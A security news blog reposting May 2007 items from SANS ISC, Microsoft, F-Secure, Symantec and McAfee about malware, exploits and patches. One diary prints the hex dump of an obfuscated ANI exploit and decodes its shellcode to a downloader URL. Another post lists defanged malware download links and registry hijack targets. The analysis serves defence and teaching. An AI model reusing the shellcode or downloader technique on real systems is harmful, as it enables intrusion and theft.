Chris Mosby at myITforum.com

Virus detection - vector vs. payload

Published: 2007-05-30,
Last Updated: 2007-05-30 10:04:41 UTC
by Daniel Wesemann (Version: 1)

In a previous diary, we've written about the surprising prevalence of those exploit "iframes" which in the end download a file called "funny.php" off a server in Russia, Panama or Ukraine, etc. "funny.php" is an EXE sailing in disguise, and usually a
password stealing spyware of the "Bancos" family. The file changes frequently and cleverly enough to keep the majority of anti virus products perpetually in the dark. The only two things that tend to "save the day" if a user happens across one
of these IFRAMEs is that firstly, the vulnerabilities exploited are pretty old (and patched). Secondly, the anti-virus detection for the exploit iframe (the infection "vector") is significantly better than detection for the spyware (the "payload").

Some anti virus products apparently trigger on the "obfuscation" of the exploit, (it is encoded Javascript), risking a higher false positive rate by doing so, but also making it less likely that a tiny change in the exploit code renders the signature useless. Others apparently trigger on the exploit itself. The obfuscation and exploits used have been pretty much the same for the past three months, so one would reasonably expect anti virus coverage to be well in place.

When today a user of mine "found" another one of these funny.phps, I decided to pass both the vector and payload files through Virustotal to see who was up to snuff:

Virustotal results for the obfuscated exploit file ("forum.php")

Virustotal results for the payload ("funny.php")

The results speak for themselves, with quite a few prominent vendors competing for the coveted "Sees No Virus" award :). I'm constantly amazed at how anti-virus ever could grow into a multi-billion dollar industry.

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************

Title: Microsoft Security Bulletin Minor Revision

Issued: May 31, 2007

********************************************************************

Summary

=======

The following bulletin has undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-029

Bulletin Information:

=====================

* MS07-029

- http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx

- Reason for Revision: Bulletin revised. File Information updated for Windows Server 2003. Clarification added throughout the bulletin for server configurations that may require the installation of DNS functionality as a prerequisite for the security update installation.

- Originally posted: May 8, 2007

- Updated: May 31, 2007

- Bulletin Severity Rating: Critical

- Version: 1.1

********************************************************************

Quicktime Security Update for 7.1.6 (Yes, really!)

Published: 2007-05-29,
Last Updated: 2007-05-29 23:29:45 UTC
by Joel Esler (Version: 2)

/** Hope you Windows guys have better luck with this update than other Apple Updates in the past **/

UPDATE:  Alot of people have written in telling us that 7.1.6 is the current version and there are no other updates.  Yes, 7.1.6 IS CURRENT.  This is a security update FOR 7.1.6 as indicated in the subject.  Please see: http://www.apple.com/support/downloads/ you will see that there ARE Security Updates.

http://docs.info.apple.com/article.html?artnum=305531

Security Update (QuickTime 7.1.6)

QuickTime

CVE-ID: CVE-2007-2388

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: An implementation issue exists in QuickTime for Java, which may allow instantiation or manipulation of objects outside the bounds of the allocated heap. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of Java applets. Credit to John McDonald, Paul Griswold, and Tom Cross of IBM Internet Security Systems X-Force, and Dyon Balding of Secunia Research for reporting this issue.

QuickTime

CVE-ID: CVE-2007-2389

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to the disclosure of sensitive information

Description: A design issue exists in QuickTime for Java, which may allow a web browser's memory to be read by a Java applet. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to the disclosure of sensitive information. This update addresses the issue by clearing memory before allowing it to be used by untrusted Java applets.

(Information came from Apple's website)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Better Business Bureau targeted malware spam

Published: 2007-05-25,
Last Updated: 2007-05-25 22:54:35 UTC
by Bojan Zdrnja (Version: 1)

We are receiving more reports about targeted attacks claiming to be from the Better Business Bureau. The spam always comes with an RTF attachment. Does this ring a bell? If you’re a frequent reader of ISC you might remember that I already post an analysis of such an attack back in March – you can find it here: http://isc.sans.org/diary.html. BBB also posted an alert about this quite a while ago (http://www.bbb.org/alerts/article.asp).

Basically the attackers use an application called Object Packager to embed an executable in a RTF document. The executable is typically a downloader which, when executed, downloads a second stage malware. The attackers keep changing both the downloader and second stage malware, together with sites they are using. It is worth pointing again that this attack does not exploit any Office vulnerability; instead it relies on social engineering (see the screenshots in the old diary).

While the attack itself is not very interesting, what is interesting is that the spam e-mails carrying this seem to be targeted. In fact, almost all reports we’ve received lately (and Sunbelt blogged about the same thing at http://sunbeltblog.blogspot.com/2007/05/seen-in-wild-extremely-dangerous-better.html) claimed that only couple of users in attacked organizations received this and that they were almost always CEOs or CFOs.

So what can we do here? As you can see from my old diary, AV detection of embedded objects in RTF documents seems to be very weak. The detection of the downloader I extracted at that point in time was a bit better but this was still far away from perfect, especially when we’re talking about the last line of defense – the AV program on the desktop machine.

If possible, you can block RTF files on your e-mail gateways, but this might have a counterproductive effect as we’ve been encouraging users for years to use “more friendly” text formats such as RTF (and who thought that objects can be embedded this easily in them).

As always, the best defense here is user education. Besides general awareness, it might be good to warn your users (especially the C*O levels) about this particular attack as it does rely purely on social engineering (the user has to confirm that he wants the executable opened).

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Cross-Platform OpenOffice Virus Proof of Concept

Published: 2007-05-24,
Last Updated: 2007-05-24 20:08:18 UTC
by John Bambenek (Version: 1)

A virus writer sent a proof-of-concept virus called BadBunny to Sophos that uses vulnerabilities in OpenOffice to infect Windows, Linux and Mac OS X. Depending on the host operating system, the virus will perform different actions to infect the target machine. In this case, it downloads a lewd image of a scantily clad woman and a dude in a big ol' bunny suit. It's not the first or last attempt at such cross-platform virus writing (or the inclusion of bizarre graphics in malware) but the limitation of seeing much of this cross-platform work lies in the fact that few applications are widely deployed and run on multiple operating systems. Few people use OpenOffice (in comparison to MS Office) to make it worth the while of a would-be attacker looking for anything other than bragging rights. However, viruses are possible for a variety of operating systems (yes, including Mac OS X) and the day may come when those users will have to be just as vigilant as those on Windows.
--
John Bambenek / bambenek {at} gmail [dot] com
University of Illinois at Urbana-Champaign

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Check this one out, its the one we have been waiting for!

********************************************************************

Title: Microsoft Security Advisory Notification

Issued: May 22, 2007

********************************************************************

Security Advisories Updated or Released Today ==============================================

* Microsoft Security Advisory (927891)

- Title: Fix for Windows Installer (MSI)

- http://www.microsoft.com/technet/security/advisory/927891.mspx

- Revision Note: Advisory published: May 22, 2007

********************************************************************

Ok this is NOT good.  Good catch Donna!! 

Symantec AntiVirus cannot detect viruses after you install a hotfix

Symantec AntiVirus cannot detect viruses after you install a hotfix on a computer that is running Windows Server 2003 or Windows XP SP2

You install a hotfix on Microsoft Windows Server 2003 or on Microsoft Windows XP Service Pack 2 (SP2). However, after you install the hotfix, Symantec AntiVirus cannot correctly detect viruses in encrypted files that reside on a network share or in a document library.

This problem occurs if you have installed the hotfix that is described in the following Microsoft Knowledge Base article:
922582 (http://support.microsoft.com/kb/922582/) Error message when you try to update a Microsoft Windows-based computer: "0x80070002"

This problem occurs if the following conditions are true:
• A legacy filesytem filter driver is installed on the same computer as Symantec AntiVirus. 
• The legacy filesystem filter driver is configured to encrypt files that are stored on network shares. 

http://support.microsoft.com/default.aspx?scid=kb;en-us;933215
http://support.microsoft.com/kb/922582/

Published Monday, May 21, 2007 6:18 PM by donna

Source: Symantec AntiVirus cannot detect viruses after you install a hotfix - Donna's SecurityFlash

Analyzing an obfuscated ANI exploit

Published: 2007-05-22,
Last Updated: 2007-05-22 07:17:54 UTC
by Bojan Zdrnja (Version: 2)

Some time ago one of our readers, Andrew, submitted an interesting ANI exploit sample. Unless you’ve been under a rock for the last couple of months, you heard about the latest ANI vulnerability.

Most of the exploits we’ve seen so far (and we’ve seen thousands of them) didn’t try to obfuscate the exploit code. The exploit code itself almost always contained a downloader that downloaded the second stage binary from a remote site and executed it on the victim’s machine.

As the exploit wasn’t obfuscated, running a simple string commands was enough to see the URL of the second stage binary. So, in order to see the second stage binary, Andrew ran the strings command on the new ANI exploit, however, this time no URL was present:

$ strings 123.htm
RIFF
ACONanih$
…
jvvr<1142;03820940:21921PQVGRCF0GZG
IgvRtqeCfftguu

Those experienced analysts amongst you will immediately notice the string starting with jvvr< and will comment that this must be a XOR-ed URL (http://something). In other words, it appears that this exploit is obfuscating the target URL. Andrew came to the same conclusion and tried to crack the XOR code.

If you try to XOR jvvr to get http, you will see that the correct XOR value is 0x02. The easiest way to do this is to use a nice little utility by Didier Stevens called XORSearch (http://didierstevens.wordpress.com/programs/xorsearch/). This utility allows you to brute force a file in order to find a XOR key for any string in the file. So I downloaded the utility and ran it on the ANI exploit sample and indeed, the correct XOR value for the http string is 0x02, but the rest of the URL was still not there:

D:\>XORSearch.exe 123.htm http
Found XOR 02 position 01FB: http>3360921:02;62803;03RSTEPAD2EXE

We can see something at the end as well that looks like notepad.exe. This means that the URL is either XOR-ed with multiple keys or some other obfuscation is used. At this point you have couple of options: you can play with brute forcing, you can infect a goat machine and just see what happens (it’s easy enough to capture network traffic of a goat machine and see what the target URL is) or you can try to analyze the exploit code itself – and that’s what we’ll do.

The trick with the latest ANI exploit was that the two bytes after the “anih” section define how many bytes are to be copied. As the vulnerable function reserved only 36 bytes on the stack it was easy to cause a buffer overflow (I won’t go into details now but the first section copy function was patched previously). So, let’s see what we have in this file:

$ xxd 123.htm
0000000: 5249 4646 0004 0000 4143 4f4e 616e 6968 RIFF....ACONanih
0000010: 2400 0000 2400 0000 ffff 0000 0a00 0000 $...$...........
0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000030: 1000 0000 0100 0000 5453 494c 0300 0000 ........TSIL....
0000040: 1000 0000 5453 494c 0300 0000 0202 0202 ....TSIL........
0000050: 616e 6968 a803 0000 0b0b 0b0b 0b0b 0b0b anih............
0000060: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................

We sure have two anih section. The buffer size of the second section (highlighted above) is 0x03a8 which is actually 936 bytes – right to the end of the file. We can also see that this section starts with a lot of 0x0b bytes. After a bunch of 0x0b bytes we can see something that looks like real code:

00000a0: 0b0b 0b0b 0b0b 0b0b 17a2 4000 0b0b 0b0b ..........@.....
00000b0: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................
00000c0: 31c9 6681 c138 02eb 035e eb05 e8f8 ffff 1.f..8...^......
00000d0: ff83 c609 802e 0246 e2fa ea02 0202 025f .......F......._
00000e0: 83ef 2f14 4202 ea8a 0302 028f 872b 1542 ../.B........+.B
00000f0: 02ea 0202 0277 746e 6f71 7030 666e 6e02 .....wtnoqp0fnn.

So what we’ll do now is take this code and disassemble it. It looks like the real code starts at 0x00000c0, so let’s get rid of everything before that:

$ dd if=123.htm of=code ibs=1 skip=192

Now there are various ways on how to disassemble this. If you are lucky and have a license for IDA Pro you can just load this file into it (actually, you can even load the 123.htm file and then manually tell IDA Pro to start disassembling the code around 0x00000c0). As I really like OllyDbg, I tend to do everything with it but in order to load this code into OllyDbg we have to create a PE file. The process now is same as when you analyze a shellcode so the easiest way is to use iDefense’s Malcode Analysis Pack and its Shellcode2Exe utility (http://labs.idefense.com/software/malcode.php#more_malcode+analysis+pack).

Once you’ve done this you will have an executable file with proper sections and headers that actually executes your code. This is how it looks in OllyDbg:



So what do we have here? The real code starts at 0x00401020. It first zeroes the ECX register (the XOR command) and adds 0x238 to it. Then it does couple of jumps and a CALL in order to get the address of the ADD ESI,9 instruction into the ESI register. This is a standard method to get the code address into a register (a CALL instruction followed by a POP instruction). The code skips 9 bytes and then loops for next 0x238 bytes. In the loop, each byte is decreased by 0x02! Aha, so this is how they obfuscated it – the code modifies itself completely (both the URL and the actual code).

You can now execute this in OllyDbg and see what happens (you will have to set a breakpoint after the loop and then tell OllyDbg to re-analyze this section). Or, if you are just interested in the final URL, we can use perl to subtract 0x02 of every byte in this file:

$ perl -pe 's/(.)/chr(ord($1)-0x02)/ge' < code > final

$ strings final
urlmon.dll
URLDownloadToFileA
c:\boot.inx
c:\boot.inx
LoadLibraryA
WinExec
ExitProcess
http://[REMOVED].72.80/70/NOTEPAD.EXE
GetProcAddress

And here we are! You can see that the code loads urlmon.dll, uses URLDownloadToFileA() function to download the URL at the bottom and saves this as c:\boot.inx.

Luckily, the AV vendors where on the ball this time – almost all AV vendors detected the ANI file properly (I do wonder if they had specific signatures for this or used a generic/heuristic one).

UPDATE

Just as I wrote that almost all AV vendors detected this sample properly, it looks like some are raising false positives as well.

We received several e-mails from our readers stating that Norton Internet Security (Symantec) detects this diary as an intrusion (“HTTP ANI File Anih Hdr Size BO”) and as a result blocks access to the diary, no matter what browser you’re using.
This is clearly a false positive as there are no ANI files in the diary (just one PNG screenshot of OllyDbg):

$ file ollyani.PNG
ollyani.PNG: PNG image data, 689 x 513, 8-bit/color RGB, non-interlaced

My guess is that they must be triggering on the hexdump or the ASCII part of it. If you are running an affected version of Symantec and have some time to play with it, it would be interesting to see what exactly triggers this – let us know if you figure this out.

Bojan

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************

Title: Microsoft Security Advisory Notification

Issued: May 21, 2007

********************************************************************

Security Advisories Updated or Released Today ==============================================

* Microsoft Security Advisory (937696)

- Title: Release of Microsoft Office Isolated Conversion Environment (MOICE) and File Block Functionality for Microsoft Office

- http://www.microsoft.com/technet/security/advisory/937696.mspx

- Revision Note: Advisory Published: May 21, 2007

********************************************************************

And you can take that to the .bank
Posted by Mikko @ 07:59 GMT

---

We've been pushing for an initiative to get a secure top-level domain (like ".bank" or ".safe") for some time now. See this post for original context.

We've received lots of questions and also plain criticism over the whole idea – most notably, in Slashdot as well as from Larry Seltzer in his prominent blog.

So let me collect the most typical challenges to the idea, and answer them.

A new top-level domain will not solve the phishing problem once and for all, so it's not even worth considering.

This is not a silver bullet. A new top-level-domain (TLD) would not be the end of the phishing problem. But it would be a helpful top-level domain and it would stop a particular subset of phishing completely.

But .com works just fine!

Today anybody can get a .com domain with a fake name and fake address, with a fake credit card. That's just fine with everybody? Don't we really need a TLD where you could actually trust that you know who owns the domain?

Phishers could still create realistic-looking fake domains. For example a look-a-like for www.citi.bank could be www.citi.bank.account.yadayada.com.

Yes, phishers would still be able to do this; this new top-level-domain would not be able to do anything to stop this problem. Same thing with masked html links.

People are stupid and would not notice such a new address scheme.

The main point of such a new TLD would not be that users would suddenly get a clue and would learn to read the web addresses correctly (although for those who do read the URLs, this would be obviously be an improvement). The main point is that it would allow the users' software to work better. Security software and browser toolbars would essentially have a "white list" to work with.

What about security researchers?

This would make life easier for security researchers to figure out which sites are not phishing sites. This really isn't as obvious as it sounds, as banks themselves use tons of different domains. We often spend precious time trying to confirm whether a particular phishy-sounding domain really belongs to a real bank or not.

Small banks and/or credit unions couldn't afford it.

Small banks are not currently the ones losing the most money. It's the big banks. And the domain doesn't have to be ".bank" literally. The TLD could be along the lines of .account, .verified, .safe, et cetera. It would be a TLD for "big players" that deal with lots of money. PayPal or eBay come to mind. And yeah, PayPal isn't a traditional bank but they certainly do get phished. They might want to have a secured TLD for account access.

Organized online criminals could afford to buy .bank domains for $50,000.

Only if they can prove that they are a real bank. And they would not be able to register misleading domain names. And in the worst case, a rogue domain would be shut down quickly. The possibility of losing their investment in registering such a domain wouldn't be worth the risk for criminals.

What about .pro?

The .pro TLD does validate who gets the domains, but it's targeting a different audience (individual professionals like doctors and lawyers).

Extended Validation (EV) certificates largely address the same issues.

We're not against these new high-security web certificates. However, a secure top-level domain would still be a good idea: it would authenticate the domain as trusted by the name alone. There's no way to know if a site has a high-security certificate without visiting it.

Banks don't deserve their own domain.

We already have a TLD for airlines (try www.nw.aero) and museums (try the.british.museum). Isn't it a bit odd we don't have one for banks? Although they are the ones that get attacked all the time?

Would this be a global domain?

Probably. Then again, nothing prevents local governments from setting up domains like .bank.uk, .bank.jp, .bank.au in their own jurisdictions.

Would it work?

Yes: in the end there probably would be no rogue sites under such a new TLD. They would be elsewhere.

There are no rogue sites on .gov domain names. Why? Because you can only get a .gov domain if you really are a US governmental organization. Or how about .fi? The .fi (Finland) domain has very few malicious websites. Why is that? Because the registration process involves mailing a verification code to a physical mailing address. Just that extra step makes it less convenient to use for the bad guys. With all the extra verifications steps that we would have in the registration of a .bank domain, scammers just wouldn't be able to do it.

Ok, I'm convinced. What's next?

This initiative won't move further until we find a sponsoring organization that starts to push it and proposes it officially to ICANN. This sponsoring organization is what we are trying to find at the moment.

This piece was crossposted with Foreign Policy blog.

Source: F-Secure : News from the Lab

Mespam meets Zunker (and targets German users)

“Whenever I post my computer puts something on the end of my post that I didn't type. Just look, it's that link and the text know will appear when I post this. P.S.Look,Super sreensaver! :)) …”

I wanted to start this blog by quoting a post picked up from one of the many forums contaminated by Mespam to show exactly what infected users experience without having a clue of what’s going on with their computer. If your friends are complaining that your e-mails, blog posts and chat sessions show a suspicious URL linking to photos, jokes or screensavers that you hadn’t sent them, you’re probably another victim of this Trojan.

Trojan.Mespam was originally spotted in February and we described here the new spreading technique, which uses an LSP component to attach text and malicious links to the outgoing HTTP traffic. In the Web 2.0 world this technique has proven its efficiency. It’s worth mentioning that Mespam was distributed via the Trojan.Peacomm P2P network.

In the last few months we’ve seen many recompiled variants of this Mespam coming out, and I’m reporting here some of the malicious URLs that users should absolutely never click, even if they seem to be posted by trusted friends. We have noticed that each outbreak of Mespam has a main “theme” in the spammed messages, such as postcards, jokes, screensavers, and photos, which is configured by a remote C&C center. When we examine the languages of contaminated forums and blogs, it looks like some infections are localized only to specific countries.

February – The “Jokes” malicious URLs series:
 hxxp://jokeonlineworld.com
 hxxp://practicaljokeonline.com
 hxxp://dailyjokeonline.com

March – The “Screensavers” malicious URLs series:
 hxxp://screensavers4us.info/funscr/silly_bear32_funny.scr
 hxxp://webcounterstat.info/screensavers/wallpapers_gold_bear_b.scr

April – The "Sex-game" malicious URLs series:
 hxxp://www.vixen-toys.com/download/sex-game-3.801.zip
 hxxp://www.marketing-know-how.com/just/sex-game-3.801.zip
 hxxp://fruitsinsuits.com.hk/images/flyers/sex-game-3.801.zip

May – The "foto" malicious URLs series (only targeting Germans?):
 hxxp://www.lastik.com/images/foto.exe
 hxxp://www.ultimatexpressions.co.uk/foto.exe
 hxxp://www.arborwood.com/images/foto.exe

With some help from Google I’ve searched forums, blogs and web boards for the keywords included in the spam messages, to estimate how many forums and sites contain infected posts. The results shown in this table were not optimistic. We should mention that Mespam also spreads through IM, traditional e-mail and web mail, so we’re not considering in this statistic all the messages spammed, for example via Gmail, Yahoo Mail, ICQ, AIM, etc.

(*) – the keyword includes all the links spammed for the “screensaver” series

But who controls what the infected bots spam, and where? This diagram shows some Mespam code on the right and a C&C interface on the left.

The interface on the left is also known as “Zunker” and is a C&C web panel that controls Mespam bots The connections between Mespam code and the Zunker panel are obvious. We have many other clues that they are just different pieces of the same thing. With this panel, the botmaster has quick statistics on the number of infected hosts, affected countries, new bots added recently, and can also see which channels, such as IM, traditional mail, webmail, and forums, are used to send spam.

The configuration area of the panel gives the botmaster the ability to choose a different template message for each channel. This is an example of a configured template found on one of the many Zunker interfaces analyzed recently.

When the botnet becomes big enough, the botmaster can use it to infect more hosts or eventually install a secondary Trojan on the infected machines. This secondary file is always configured from the Zunker interface, and is usually a bank Trojan or DDoS threat. In some cases, after the botnet is ready, the botmaster tries to sell this “install-a-Trojan” service to other cyber-criminals who can decide which Trojan to distribute on the infected hosts.

For example, we’ve seen a file named “ebr9.exe” on a Zunker botnet, which from the panel statistics was targeting mostly German users. This Trojan drops the BHO file “%SYSTEM%\console32.dll” and tries to hijack the execution of the following German programs by changing the registry key “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option” for each of them:

Banking.exe
BankingUpdate.exe
Erinnerung.exe
GetOn4uHdWID.exe
MG.exe
MGBSE.exe
Mnyupdate.exe
Msmoney.exe
Netviewer.exe
Nv_o2o_Teilnehmer_DE.exe
Salv.exe
Sanitize.exe
SCRSetup.exe
Smkonv.exe
StartStarMoney.exe

The reason for this registry key change is unclear, but German users who have these specific programs should double-check their machines for this Trojan.

We don’t know if the Zunker interface was created together with Trojan.Mespam, or if it was added later by someone else. The current statistics of Mespam samples show that there’s a specific Zunker web panel link hardcoded in every different version of Trojan.Mespam DLL. So probably the package Mespam/Zunker is sold together on the underground market.

Posted by Elia Florio on May 18, 2007 03:13 PM

Source: Symantec Security Response Weblog: Mespam meets Zunker (and targets German users)

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 17, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment. Please see the appropriate bulletin for more details.

* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934873
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934233
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
********************************************************************

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 16, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-027
* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-027

- http://www.microsoft.com/technet/security/bulletin/ms07-027.mspx
- Reason for Revision: Bulletin revised due to an incorrect file name in Arbitrary File Rewrite Vulnerability - CVE-2007-2221 killbit table; A new issue discovered with the security update: 937409 The "File Download - Security Warning" dialog box opens when you try to open Internet Explorer 7; Updated file names for Internet Explorer 7
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: Bulletin workarounds section updated, with the removal of the "Use Microsoft Word Viewer 2003 to open and view files" workaround. This workaround is not valid for the vulnerability discussed in this security bulletin.
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: Bulletin "Installation File Information" section updated with the correct file name for the Office 2007 Compatibility Pack.
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
********************************************************************

New For-Profit Symbian Trojans
Posted by Jarno @ 12:46 GMT

---

Yesterday we received a couple interesting cases from our partner. Three new for-profit SMS trojans that affect Symbian S60 2nd Edition and older devices.

The Viver family of trojans claim to be utility programs for Symbian phones. They have been uploaded to at least one popular file sharing site in the hopes that people will download and install them.

After installation, the Viver trojans immediately start sending SMS messages to premium-rate numbers. The messages are sent with proper international area codes, so they are able to reach the correct destination even when activated outside Russia.

We've already seen for-profit malware in mobile devices: Wesber.A and Redbrowser are Java Midlet trojans that try to send messages to Russian premium-rate numbers. But these trojans require user acceptance per each message and are able to send messages correctly only inside Russia.

But as the Viver family is more advanced and is able to operate anywhere, we find this development worrisome. Prior to 2003 there was little for-profit malware on the PC platform, and now almost all malware is written for one or other profit motivation. It is very likely that more for-profit malware will also appear on mobile platforms.

All three Viver variants are detected with F-Secure Mobile Anti-Virus.

For more information on Viver see Viruslist.com's: Analyst's Diary.

Source: F-Secure : News from the Lab

Downloader-BBS: The Italian Job

Thursday May 17, 2007 at 4:35 am CST
Posted by Vinoo Thomas

Trackback

McAfee Avert Labs encountered a spam run yesterday specifically targeting individuals in Italy by using a social engineering technique. The spammed email worded in Italian appears to be from the Italian Police warning users that they have evidence that pirated mp3 files were found to be downloaded on their computer. The email has been craftily worded and looks convincing enough for duping recipients that the mail is genuine. A copy of the spammed email is as follows:

Except that makes you wonder: since when did the RIAA team up with the Italian police?

Such targeted attacks on specific countries or communities are becoming more and more frequent. German internet users must be sick of weekly spam runs of the Downloader-AAP trojan with similar social engineering themes. A typical spam run lasts for a few hours and is usually seeded from a botnet of infected computer. Malware authors typically create a single use disposable trojan and test it against detection by popular antivirus vendors tweaking them until it becomes undetected. This gives the trojan a better shelf life in the wild in order to evade proactive detection by anitivirus software. Next time a spam run is executed, a new variant is used and this vicious cycle continues. It is also observed that the same binary is never used again in another spam run.

The mass spammed Downloader-BBS sample in this case arrives in a password protected archive with the password specified in the message body. Once executed it downloads a dialer program designed to connect to a premium-rate number from a remote web server based in Russia.

You would think most folks would be wary of opening a password protected attachment and inputting the password to execute the payload. But with millions of newbie users using the internet, morbid curiosity will always get the better of someone who is receiving such a type of email for the first time.

Detection for this threat is already available in the beta dats and will released in today’s 5033 DATs.

This entry was posted on Thursday, May 17th, 2007 at 4:35 am and is filed under Malware Research, Spam and Phishing. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Source: Computer Security Research - McAfee Avert Labs Blog